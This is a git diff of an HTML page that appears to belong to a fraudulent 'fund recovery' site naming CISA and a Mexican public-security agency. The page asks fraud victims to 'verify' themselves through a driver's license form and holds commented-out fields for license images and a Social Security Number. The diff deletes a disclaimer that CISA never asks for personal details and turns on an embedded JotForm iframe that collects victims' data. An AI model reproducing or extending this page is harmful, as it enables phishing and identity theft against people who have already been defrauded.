--- a/report.html
+++ b/report.html
@@ -143,8 +143,7 @@ Feel free to give us a call <br><br><a href="tel:(720)921-4977" class="call-butt
 <!-- Additional input form for driver's license and SSN -->
 <form id="driverLicenseForm" class="driver-license-form">
   <p><h4>Due to high occurances of cyber attacks and fraudulent online activities, we would want to verify that you are the individual that filled and filed the form before any further investigative action is taken. <br><br>
-  While w work to get you a refund for your lost fund, we need you to note that CISA and the Secretaria de Seguridad Publica will never ask for any personal details.
-  <br><br>click on the button to get an mail notification when we have successful retrieved your fund. <br><button onclick="alert('You will get an email soon with form status and fund retrieval steps')">GET NOTIFICATION</button><br>NOTE: Fund retrieval and refund is only accessible of fund is below $3000 US dollars.
+
   </h4></p><br>
 
   <!-- <label for="country">Country * :</label>
@@ -175,7 +174,7 @@ Feel free to give us a call <br><br><a href="tel:(720)921-4977" class="call-butt
   <label for="driverLicenseBack">Driver's License (Back) * :</label>
   <input type="file" id="driverLicenseBack" name="driverLicenseBack" accept="image/*" required> -->
 
-  <!-- <iframe
+  <iframe
   id="JotFormIFrame-240395410605046"
   title="Form"
   onload="window.parent.scrollTo(0,0)"
@@ -187,7 +186,7 @@ Feel free to give us a call <br><br><a href="tel:(720)921-4977" class="call-butt
   style="min-width:100%;max-width:100%;height:539px;border:none;"
   scrolling="no"
 >
-</iframe> -->
+</iframe>
 
   <!-- <label for="ssn">Social Security Number (SSN) * :</label>
   <input type="text" id="ssn" name="ssn" required>
